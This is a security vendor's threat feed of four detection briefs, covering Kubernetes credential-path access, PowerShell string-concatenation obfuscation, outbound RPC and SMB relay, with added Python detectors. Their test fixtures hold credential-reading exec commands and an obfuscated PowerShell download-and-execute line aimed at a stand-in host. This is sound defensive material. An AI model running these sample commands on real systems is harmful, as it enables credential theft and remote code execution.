{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/products/elastic-license-v2/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic License v2"],"_cs_severities":["high"],"_cs_tags":["kubernetes","credential-access","execution"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection identifies Kubernetes pod exec sessions accessing sensitive files or credential paths. The goal is to detect attackers attempting to steal credentials or configuration information from within Kubernetes pods. This often occurs after initial access and may precede lateral movement, privilege escalation, or data exfiltration. The detection focuses on command lines that reference paths related to service account tokens, kubelet configuration, host identity stores, common private keys, keystore extensions, process environment dumps, and configuration files with embedded secrets. 
The rule is designed to catch both interactive and scripted access, and includes exclusions for benign reads of resolv.conf.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to a Kubernetes cluster, for example through a compromised application or a misconfigured service.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ekubectl exec\u003c/code\u003e or an equivalent client to run commands inside a pod. Each call goes through the API server\u0026rsquo;s \u003ccode\u003epods/exec\u003c/code\u003e subresource, and the audit log records the request URI, including the URL-encoded \u003ccode\u003ecommand=\u003c/code\u003e arguments that the detection decodes.\u003c/li\u003e\n\u003cli\u003eThe executed command reads sensitive files or directories in the pod\u0026rsquo;s filesystem, such as \u003ccode\u003e/var/run/secrets/kubernetes.io/serviceaccount/token\u003c/code\u003e, to obtain the pod\u0026rsquo;s service account token.\u003c/li\u003e\n\u003cli\u003eIf the pod has hostPath mounts or runs privileged, the command may also target host-level files such as the node\u0026rsquo;s \u003ccode\u003e/etc/shadow\u003c/code\u003e or \u003ccode\u003e/etc/passwd\u003c/code\u003e, or the kubelet configuration and client certificates under \u003ccode\u003e/var/lib/kubelet\u003c/code\u003e or \u003ccode\u003e/etc/kubernetes\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker may dump process environments via \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/environ\u003c/code\u003e or \u003ccode\u003e/proc/self/environ\u003c/code\u003e to extract secrets passed as environment variables.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the obtained credentials or configuration to move laterally to other pods or nodes within the cluster.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges within the cluster by abusing stolen service account tokens or node credentials.\u003c/li\u003e\n\u003cli\u003eThe final objective is to exfiltrate sensitive data, deploy malicious workloads, or disrupt services within the Kubernetes environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the compromise of sensitive data, including credentials, configuration files, and application secrets. 
This can enable attackers to move laterally within the Kubernetes cluster, escalate privileges, and potentially gain control over the entire environment. The severity of the impact depends on the sensitivity of the data exposed and the level of access achieved by the attacker.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect sensitive file access within Kubernetes pod exec sessions. The rule only sees what the audit log records, so make sure your audit policy logs \u003ccode\u003epods/exec\u003c/code\u003e requests at the Metadata level or higher; the command arguments travel in the request URI.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts triggered by the rule, using the \u003ccode\u003eEsql.access_type\u003c/code\u003e classification (service account token, kubelet configuration, host identity store, private key, process environment, and so on) to prioritize incidents, and confirm who ran the exec and from which source address.\u003c/li\u003e\n\u003cli\u003eRestrict the \u003ccode\u003epods/exec\u003c/code\u003e subresource through RBAC so that only the users and service accounts that genuinely need interactive access hold the \u003ccode\u003ecreate\u003c/code\u003e verb on it.\u003c/li\u003e\n\u003cli\u003eUse Pod Security Admission (the \u003ccode\u003ebaseline\u003c/code\u003e or \u003ccode\u003erestricted\u003c/code\u003e profile) or an equivalent admission policy to block privileged pods and hostPath mounts unless they are explicitly required.\u003c/li\u003e\n\u003cli\u003eMonitor Kubernetes audit logs for suspicious \u003ccode\u003ekubectl exec\u003c/code\u003e activity, including unusual command lines, source addresses, or access patterns.\u003c/li\u003e\n\u003cli\u003eLimit the value of a stolen token: set \u003ccode\u003eautomountServiceAccountToken: false\u003c/code\u003e on workloads that do not talk to the API server, prefer short-lived bound projected tokens over legacy long-lived secret-based tokens, and rotate other sensitive credentials regularly.\u003c/li\u003e\n\u003cli\u003eUse the provided Kubernetes audit log query to proactively search for historical instances of sensitive file access.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T21:42:34Z","date_published":"2026-05-04T21:42:34Z","id":"/briefs/2024-01-kubernetes-pod-exec-sensitive-file-access/","summary":"This rule detects Kubernetes pod exec sessions where the decoded command line references sensitive files or paths such as mounted service account tokens, kubelet and control-plane configuration, host identity stores, private keys, and process environment dumps, aiming to identify potential lateral movement, privilege escalation, or 
credential theft.","title":"Kubernetes Pod Exec Sensitive File or Credential Path Access","url":"https://feed.craftedsignal.io/briefs/2024-01-kubernetes-pod-exec-sensitive-file-access/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic License v2"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","powershell","obfuscation"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule identifies PowerShell scripts employing concatenated string literals within dynamic invocation constructs like \u003ccode\u003e\u0026amp;()\u003c/code\u003e or \u003ccode\u003e.()\u003c/code\u003e. This obfuscation technique allows attackers to construct commands dynamically, making it harder to detect their malicious intent based on static analysis or keyword matching. By breaking commands into smaller, concatenated strings, attackers aim to bypass traditional signature-based detections and evade AMSI (Anti-Malware Scan Interface). This technique has been observed in various campaigns where threat actors attempt to execute malicious code while minimizing the chances of detection. 
This activity is particularly concerning for defenders, as it highlights a common method to bypass security measures.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker executes a PowerShell script on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe PowerShell script uses string concatenation to build malicious commands dynamically.\u003c/li\u003e\n\u003cli\u003eDynamic invocation constructs like \u003ccode\u003e\u0026amp;()\u003c/code\u003e or \u003ccode\u003e.()\u003c/code\u003e are used to execute the concatenated commands.\u003c/li\u003e\n\u003cli\u003eThe obfuscated commands bypass keyword-based detections and AMSI.\u003c/li\u003e\n\u003cli\u003eThe attacker performs malicious activities, such as downloading additional payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded payloads to establish persistence or exfiltrate data.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as stealing sensitive information or deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to complete system compromise, data theft, and potential ransomware deployment. Attackers can leverage this technique to evade security controls and execute malicious commands undetected. 
The impact is high because the technique defeats defenses that match on command keywords, letting attackers run their tooling and maintain persistence, and the same obfuscated loader is commonly reused across many hosts in an organization.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable PowerShell Script Block Logging (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) to capture the events necessary for this detection, as indicated in the setup instructions linked in the source material. Script block logging records the script text as written, so the concatenated fragments are visible even when the assembled command never appears in a process command line.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect PowerShell Obfuscation via String Concatenation\u003c/code\u003e to your SIEM and tune it for your environment; legitimate administrative scripts occasionally build command names from fragments, so exclude known scripts by path or signer rather than weakening the pattern.\u003c/li\u003e\n\u003cli\u003eInvestigate alerts generated by the Sigma rule by reconstructing the concatenated string to learn which cmdlet or executable was actually invoked, and by reviewing the process that launched PowerShell, as outlined in the triage and analysis section of the source material.\u003c/li\u003e\n\u003cli\u003eMonitor for follow-on activity, such as child processes, file modifications, and network connections originating from PowerShell processes exhibiting obfuscation techniques.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:00:00Z","date_published":"2024-01-03T15:00:00Z","id":"/briefs/2024-01-posh-concat-obfuscation/","summary":"This rule detects PowerShell scripts that build commands from concatenated string literals within dynamic invocation constructs, a technique used by attackers to obscure execution intent, bypass keyword-based detections, and evade AMSI.","title":"PowerShell Obfuscation via Concatenated Dynamic Command Invocation","url":"https://feed.craftedsignal.io/briefs/2024-01-posh-concat-obfuscation/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic License v2"],"_cs_severities":["high"],"_cs_tags":["network-traffic","initial-access","lateral-movement","rpc"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThe 
Remote Procedure Call (RPC) protocol, while essential for legitimate system administration tasks such as remote maintenance and resource sharing within internal networks, poses a significant security risk when exposed to the internet. Threat actors frequently target and exploit RPC services as an initial access vector, or use RPC as a backdoor channel on systems they have already compromised. Such exposure allows attackers to remotely execute commands, move laterally within the network, and potentially exfiltrate sensitive data. This brief provides detection strategies to identify such anomalous RPC traffic, enabling security teams to proactively mitigate potential threats. The detection identifies TCP connections to port 135 (the RPC endpoint mapper) from internal IP ranges to external IP addresses; that port should almost never be reached on the internet from a corporate network.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises a host within the internal network, potentially through phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe compromised host initiates a TCP connection to an external IP address on port 135, either because the attacker\u0026rsquo;s implant uses RPC/DCOM to an attacker-controlled server as its command channel, or because it is reaching an RPC service that has been exposed on the internet. This outbound connection is the event the rule alerts on.\u003c/li\u003e\n\u003cli\u003eOver that channel the attacker issues commands to the compromised host and collects their output.\u003c/li\u003e\n\u003cli\u003eFrom the foothold, the attacker enumerates internal network resources and identifies targets for lateral movement.\u003c/li\u003e\n\u003cli\u003eThe attacker authenticates to other internal systems and remotely executes commands on them, typically over RPC, DCOM, or SMB. This internal-to-internal traffic is out of scope for this rule and should be covered by separate lateral-movement detections.\u003c/li\u003e\n\u003cli\u003eThe attacker installs malware or a backdoor on the target systems for persistence.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the established foothold to further propagate within the network, compromising additional systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of RPC services exposed to the internet can lead to a complete compromise of 
the internal network. Attackers can gain initial access, move laterally, exfiltrate sensitive data, deploy ransomware, or disrupt critical business operations. A single exposed RPC service can serve as a gateway for widespread damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement the provided Sigma rule against network connection logs to detect TCP traffic on port 135 from internal IP ranges to external destinations. The rule is purely port- and range-based, so maintain an accurate definition of what counts as internal: RFC 1918 space, loopback, link-local, shared address space (100.64.0.0/10), and any public ranges your organization routes internally; otherwise those hosts will show up as external destinations.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the rule, prioritizing systems with repeated or periodic connections, connections outside maintenance windows, and destinations with no business relationship (logsource: network_connection).\u003c/li\u003e\n\u003cli\u003eEnsure that RPC services are not directly exposed to the internet. Implement firewall rules to restrict access to authorized internal IP ranges only.\u003c/li\u003e\n\u003cli\u003eContinuously monitor network traffic for anomalous RPC activity and correlate with other security events (logsource: network_connection).\u003c/li\u003e\n\u003cli\u003eReview and update firewall configurations to block unauthorized outbound connections on port 135 at the perimeter, and treat a blocked attempt with the same suspicion as a completed connection, since the host still tried to reach the destination (logsource: firewall).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:27:00Z","date_published":"2024-01-03T14:27:00Z","id":"/briefs/2024-01-rpc-internet-access/","summary":"This brief focuses on detecting Remote Procedure Call (RPC) traffic originating from internal networks and reaching the public internet, which is indicative of potential initial access or backdoor activity.","title":"Detecting RPC Traffic to the Internet","url":"https://feed.craftedsignal.io/briefs/2024-01-rpc-internet-access/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic License v2"],"_cs_severities":["high"],"_cs_tags":["credential-access","smb-relay","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule identifies potential SMB relay attacks 
targeting machine accounts in Windows environments. In a relay attack the adversary does not crack a credential: it induces a victim to authenticate to a host it controls and forwards that live NTLM authentication to another service, which accepts it as the victim. The detection analyzes Windows Security Event Logs for file share access events (event code 5145) where the source IP address is not one of the target server\u0026rsquo;s own addresses, yet the user name is the target server\u0026rsquo;s own computer account (the host name followed by \u0026ldquo;$\u0026rdquo;). A server does not normally reach its own shares from a foreign address under its own machine account, so this combination indicates that an attacker has relayed the server\u0026rsquo;s authentication back to it, effectively impersonating the machine account. Detecting this behavior is crucial for identifying and mitigating potential lateral movement and credential access attempts within the network.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises a host within the network and runs an NTLM relay listener on it.\u003c/li\u003e\n\u003cli\u003eThe attacker induces the target server to authenticate to the attacker-controlled host, for example through name-resolution poisoning or an RPC call that makes the server initiate an outbound authenticated connection to a host of the attacker\u0026rsquo;s choosing.\u003c/li\u003e\n\u003cli\u003eThe target server authenticates to the attacker\u0026rsquo;s host with its machine account.\u003c/li\u003e\n\u003cli\u003eThe attacker relays that authentication to an SMB service, on the target server itself or on another server where the machine account has access; the relay succeeds only if the destination does not require SMB signing.\u003c/li\u003e\n\u003cli\u003eThe destination accepts the relayed authentication and grants a session as the machine account. Share access in that session is logged as event 5145 with the machine account as the subject and the attacker\u0026rsquo;s host as the source address.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to network shares and resources on the target server.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts lateral movement to other systems within the domain.\u003c/li\u003e\n\u003cli\u003eThe attacker performs credential access activities, such as dumping credentials or accessing sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to gain unauthorized access to network resources, potentially leading to 
lateral movement, data theft, or system compromise. A server\u0026rsquo;s own machine account typically has extensive rights on that server, so a successful relay often yields full control of it and a springboard into the rest of the domain. This can result in significant financial losses, reputational damage, and legal liabilities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Audit Detailed File Share monitoring to generate the necessary event logs for detection (setup instructions: \u003ca href=\"https://ela.st/audit-detailed-file-share\"\u003ehttps://ela.st/audit-detailed-file-share\u003c/a\u003e). This audit subcategory is verbose; scope it to servers whose shares matter and make sure event 5145 is forwarded to the SIEM.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule \u0026ldquo;Potential Machine Account Relay Attack via SMB\u0026rdquo; to your SIEM to detect event 5145 records where the subject is the server\u0026rsquo;s own machine account and the source address is not the server itself.\u003c/li\u003e\n\u003cli\u003eInvestigate alerts by reviewing the surrounding logon events (4624 and 4625) on the server to confirm an NTLM network logon of the machine account from the unexpected source IP, and check whether that source IP is in fact one of the server\u0026rsquo;s own interfaces; multi-homed hosts and IPv6 addresses are a common source of false positives.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation and restrict SMB access between systems to limit the potential impact of SMB relay attacks.\u003c/li\u003e\n\u003cli\u003eRequire SMB signing on servers and clients so that relayed authentication is rejected; for other protocols that NTLM can be relayed to, apply the equivalent protections, such as LDAP signing and channel binding, or Extended Protection for Authentication on HTTP endpoints.\u003c/li\u003e\n\u003cli\u003ePivot on the affected host and look for related alerts: suspicious authentication, service creation, persistence, or credential access shortly after the share access.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-machine-account-relay/","summary":"The rule identifies potential relay attacks against a machine account by detecting network share access events originating from a remote source IP but utilizing the target server's computer account, which may indicate an SMB relay 
attack.","title":"Potential Machine Account Relay Attack via SMB","url":"https://feed.craftedsignal.io/briefs/2024-01-machine-account-relay/"}],"language":"en","title":"CraftedSignal Threat Feed — Elastic License V2","version":"https://jsonfeed.org/version/1.1"}
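For the brief "Kubernetes Pod Exec Sensitive File or Credential Path Access" above, an added worked example (not part of the feed entry and not Elastic's rule): it decodes the command line from the `command=` query parameters of `pods/exec` audit-log requests and classifies it by the sensitive path it references, with the resolv.conf exclusion the brief mentions. The audit events, the path patterns and the access_type labels are all constructed for this example.

```python
"""Decode Kubernetes pods/exec audit records and classify sensitive path access.
Added example; the events, patterns and labels below are constructed, not Elastic's."""
import re
from urllib.parse import urlsplit, parse_qs

# First match wins, so the most specific categories come first.  The labels mimic
# the coarse access_type classification the brief describes; they are this example's own.
SENSITIVE_PATTERNS = [
    ("service_account_token", re.compile(r"/var/run/secrets/kubernetes\.io/serviceaccount/")),
    ("kubelet_config",        re.compile(r"/var/lib/kubelet/|/etc/kubernetes/")),
    ("host_identity_store",   re.compile(r"/etc/(shadow|gshadow|passwd|sudoers)\b")),
    ("private_key",           re.compile(r"/\.ssh/|\.(pem|key|p12|pfx|jks|keystore)\b")),
    ("process_environ",       re.compile(r"/proc/(\d+|self)/environ\b")),
    ("config_with_secrets",   re.compile(r"/\.(kube|aws|docker)/|(^|\s|/)\.env\b")),
]
# The brief says the rule excludes benign reads of resolv.conf.
BENIGN = re.compile(r"^(cat|head|tail|grep\s+\S+)\s+/etc/resolv\.conf$")


def decode_exec_command(request_uri):
    """kubectl sends each argv element as its own URL-encoded `command=` query
    parameter; parse_qs keeps their order and decodes them, so joining them
    gives back the command line that ran inside the container."""
    parts = urlsplit(request_uri)
    if not parts.path.endswith("/exec"):
        return None
    args = parse_qs(parts.query).get("command")
    return " ".join(args) if args else None


def classify(event):
    """Return (access_type, command) for a sensitive exec, else None."""
    if event.get("verb") != "create" or event.get("objectRef", {}).get("subresource") != "exec":
        return None
    cmd = decode_exec_command(event["requestURI"])
    if not cmd or BENIGN.match(cmd):
        return None
    for label, pattern in SENSITIVE_PATTERNS:
        if pattern.search(cmd):
            return label, cmd
    return None


def scan(events):
    """Run the classification over audit events; return (user, pod, access_type, command) hits."""
    hits = []
    for ev in events:
        result = classify(ev)
        if result:
            hits.append((ev["user"]["username"], ev["objectRef"]["name"], *result))
    return hits


def _event(user, pod, query, subresource="exec"):
    # Constructed, shortened audit event (Metadata-level fields only).
    return {
        "verb": "create",
        "user": {"username": user},
        "objectRef": {"resource": "pods", "namespace": "prod", "name": pod, "subresource": subresource},
        "requestURI": f"/api/v1/namespaces/prod/pods/{pod}/{subresource}?{query}",
    }


SAMPLE_EVENTS = [
    _event("alice", "web-1",   # mounted service account token
           "command=cat&command=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftoken&container=web&stdout=true"),
    _event("alice", "web-1",   # benign, excluded
           "command=cat&command=%2Fetc%2Fresolv.conf&container=web&stdout=true"),
    _event("ci-bot", "build-7",  # sh -c "cat /proc/1/environ | tr '\0' '\n'"
           "command=sh&command=-c&command=cat+%2Fproc%2F1%2Fenviron+%7C+tr+%27%5C0%27+%27%5Cn%27&container=build&stdout=true"),
    _event("mallory", "debug-0",  # node filesystem reached through a hostPath mount at /host
           "command=ls&command=-la&command=%2Fhost%2Fvar%2Flib%2Fkubelet%2Fpki&container=shell&stdout=true"),
    _event("mallory", "debug-0",
           "command=cat&command=%2Fhost%2Fetc%2Fshadow&container=shell&stdout=true"),
    _event("bob", "api-2", "container=api&follow=true", subresource="log"),  # not an exec
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The classification runs on the decoded command, so a hostPath-mounted node filesystem (`/host/etc/shadow`) is caught by the same pattern as the in-container path; in production, carry the pod's `hostPath`/`privileged` flags from the pod spec into the alert to rank node-level exposures higher.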
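For the brief "PowerShell Obfuscation via Concatenated Dynamic Command Invocation" above, an added worked example (not part of the feed entry and not Elastic's rule): it finds `&(...)` and `.(...)` invocations whose target is assembled from concatenated string literals and rebuilds the invoked name, which is the reconstruction step the brief's triage guidance calls for. The regular expression and the script block texts are this example's own constructions.

```python
"""Detect `&('a'+'b')` / `.("a"+"b")` invocations in PowerShell script block text and
reconstruct the invoked name.  Added example; samples and regex are constructed."""
import re

# A single- or double-quoted PowerShell string literal.  No escape handling: an
# assumption that holds for the short fragments this technique concatenates.
LITERAL = r"""(?:'[^']*'|"[^"]*")"""

# `&(` or `.(` that is NOT member access such as `$obj.(...)` (the lookbehind rejects
# a preceding identifier character, `$`, `]` or `)`), followed by two or more
# literals joined with `+` and nothing else inside the parentheses.
CONCAT_INVOKE = re.compile(
    r"(?<![\w$\]\)])[&.]\s*\(\s*(" + LITERAL + r"(?:\s*\+\s*" + LITERAL + r")+)\s*\)"
)
PIECE = re.compile(r"'([^']*)'|\"([^\"]*)\"")


def reconstruct(concat_expr):
    """'Inv' + "oke-Ex" + 'pression'  ->  Invoke-Expression"""
    return "".join(single or double for single, double in PIECE.findall(concat_expr))


def find_concat_invocations(script_text):
    """Return (reconstructed_name, matched_source) for each hit in one script block."""
    return [(reconstruct(m.group(1)), m.group(0)) for m in CONCAT_INVOKE.finditer(script_text)]


# Constructed script block contents, as they would appear in event 4104 ScriptBlockText.
SAMPLE_SCRIPT_BLOCKS = {
    "loader": "$u='http://example.invalid/p.txt'\n"
              "&('Inv'+'oke-Ex'+'pression') (New-Object Net.WebClient).DownloadString($u)",
    "dotsourced": '.("IE"+"X") $payload',
    "spaced": "& (\"Get-\" + 'Process') | Select-Object -First 3",
    "member_access": "$obj.('Na'+'me')",           # dynamic property access, not an invocation
    "plain_call": '& "C:\\Tools\\run.exe" -q',      # dynamic invocation without concatenation
    "string_only": "Write-Host ('a'+'b')",           # concatenation without invocation
}


def triage(blocks):
    """Map each block name to the reconstructed invocation targets found in it."""
    return {name: [hit[0] for hit in find_concat_invocations(text)]
            for name, text in blocks.items()}


if __name__ == "__main__":
    for name, targets in triage(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"{name:14s} {targets}")
```

The reconstruction only joins literal fragments; a double-quoted fragment containing `$var` or a `[char]` cast is left as written, so treat an odd-looking result as a prompt to pull the full 4104 event rather than as the final answer. The `spaced` sample reconstructs to a harmless cmdlet, which is why the recommendation is to exclude known scripts by path or signer instead of loosening the pattern.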
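For the brief "Detecting RPC Traffic to the Internet" above, an added worked example (not part of the feed entry and not Elastic's rule): it applies the brief's condition, TCP to port 135 from an internal source to an external destination, to network-connection records, with an explicit definition of "internal" that includes shared address space and multicast, which a bare RFC 1918 check would miss. The flows are constructed; the 203.0.113.0/24 and 2001:db8::/32 documentation ranges stand in for public addresses.

```python
"""Evaluate network-connection records for TCP/135 from internal to external.
Added example; flows and the internal-range list are constructed for it."""
import ipaddress

# Ranges treated as internal.  The rule's own exclusion list is longer (it also
# covers IANA special-purpose blocks); extend ORG_INTERNAL with any public space
# your organization routes internally, or those hosts will look like external targets.
INTERNAL_RANGES = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "100.64.0.0/10",                                    # shared address space (CGNAT)
    "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4",     # loopback, link-local, multicast
    "::1/128", "fc00::/7", "fe80::/10", "ff00::/8",     # IPv6 equivalents
)]
ORG_INTERNAL = []   # e.g. [ipaddress.ip_network("203.0.113.128/25")] for public space used internally


def is_internal(addr):
    """Accepts an address object or its text form; version mismatches simply do not match."""
    if isinstance(addr, str):
        addr = ipaddress.ip_address(addr)
    return any(addr in net for net in INTERNAL_RANGES + ORG_INTERNAL)


def is_rpc_to_internet(flow):
    """The brief's condition: TCP, destination port 135, internal source, external destination."""
    if flow["proto"] != "tcp" or flow["dst_port"] != 135:
        return False
    return is_internal(flow["src"]) and not is_internal(flow["dst"])


def alerts(flows):
    return [f for f in flows if is_rpc_to_internet(f)]


def _flow(fid, src, dst, dst_port, proto="tcp"):
    # Constructed network-connection record (only the fields the rule needs).
    return {"id": fid, "src": src, "dst": dst, "dst_port": dst_port, "proto": proto}


SAMPLE_FLOWS = [
    _flow("f1", "10.1.2.3", "203.0.113.10", 135),          # workstation -> internet endpoint mapper
    _flow("f2", "10.1.2.3", "10.1.2.50", 135),             # internal lateral RPC: other rules' job
    _flow("f3", "100.64.3.9", "203.0.113.10", 135),        # CGNAT source still counts as internal
    _flow("f4", "10.1.2.3", "203.0.113.10", 135, "udp"),   # not TCP
    _flow("f5", "10.1.2.3", "203.0.113.10", 445),          # SMB, not RPC endpoint mapper
    _flow("f6", "203.0.113.5", "10.1.2.3", 135),           # inbound: an exposure, but a different rule
    _flow("f7", "fd00::10", "2001:db8::1", 135),           # IPv6 ULA source -> external
]

if __name__ == "__main__":
    print([f["id"] for f in alerts(SAMPLE_FLOWS)])
```

Flow `f6` is the inbound case the brief's text also warns about (an RPC service reachable from the internet); it needs a separate inbound rule or, better, a perimeter policy that makes such a flow impossible.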
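For the brief "Potential Machine Account Relay Attack via SMB" above, an added worked example (not part of the feed entry and not Elastic's rule): it applies the brief's 5145 condition, the server's own computer account accessing a share from an address that is not the server's, and handles the false-positive sources the recommendations mention (local access, the server's own interfaces, IPv4-mapped IPv6 addresses). The events and the host-address inventory are constructed for this example.

```python
"""Flag Security event 5145 records where a server's own machine account arrives from
a remote address.  Added example; events and inventory are constructed."""
import ipaddress

# Constructed inventory: the addresses that belong to each monitored server.
HOST_ADDRESSES = {
    "FILESRV01": {"10.0.5.10", "fe80::1c2d:3e4f:5a6b:7c8d"},
}


def _normalize(ip_text):
    """Parse the IpAddress field; '-' (local access) and unparsable values yield None."""
    try:
        addr = ipaddress.ip_address(ip_text)
    except ValueError:
        return None
    # Windows can log IPv4 clients as IPv4-mapped IPv6 addresses (::ffff:a.b.c.d).
    if addr.version == 6 and addr.ipv4_mapped is not None:
        return addr.ipv4_mapped
    return addr


def is_machine_account_relay(event, host_addresses=HOST_ADDRESSES):
    """True when 5145 shows the server's own computer account (HOST$) coming from a remote IP."""
    if event.get("EventID") != 5145:
        return False
    user = event["SubjectUserName"]
    if not user.endswith("$"):
        return False                                   # a user account: out of scope
    host = event["Computer"].split(".")[0]             # NetBIOS name from the FQDN
    if user[:-1].casefold() != host.casefold():
        return False                                   # some other computer's account: normal
    src = _normalize(event["IpAddress"])
    if src is None or src.is_loopback:
        return False                                   # local or unknown source
    own = {ipaddress.ip_address(a) for a in host_addresses.get(host, ())}
    return src not in own


def find_relay_candidates(events):
    return [(e["Computer"], e["SubjectUserName"], e["IpAddress"], e["ShareName"])
            for e in events if is_machine_account_relay(e)]


def _e(user, ip, share, computer="FILESRV01.corp.example", event_id=5145):
    # Constructed, shortened 5145 record (only the fields the check needs).
    return {"EventID": event_id, "Computer": computer, "SubjectUserName": user,
            "IpAddress": ip, "ShareName": share}


SAMPLE_EVENTS = [
    _e("FILESRV01$", "10.0.5.77", r"\\*\ADMIN$"),              # relayed machine account: hit
    _e("FILESRV01$", "127.0.0.1", r"\\*\IPC$"),                # server talking to itself locally
    _e("FILESRV01$", "10.0.5.10", r"\\*\IPC$"),                # server's own interface address
    _e("filesrv01$", "::ffff:10.0.5.77", r"\\*\C$"),           # same hit, IPv4-mapped and lower-case
    _e("WS-042$", "10.0.8.3", r"\\*\SYSVOL"),                  # another computer's account: normal
    _e("jdoe", "10.0.5.77", r"\\*\Finance"),                   # user account, not a machine account
    _e("FILESRV01$", "10.0.5.77", r"\\*\IPC$", event_id=5140),  # share connect, not the object access event
]

if __name__ == "__main__":
    for hit in find_relay_candidates(SAMPLE_EVENTS):
        print(hit)
```

Keeping the inventory of each server's own addresses current is what separates a clean rule from a noisy one; a server that reaches its own shares through a second NIC or a cluster address will otherwise alert on every access. Corroborate a hit with the matching 4624 (logon type 3, NTLM) from the same source IP before escalating.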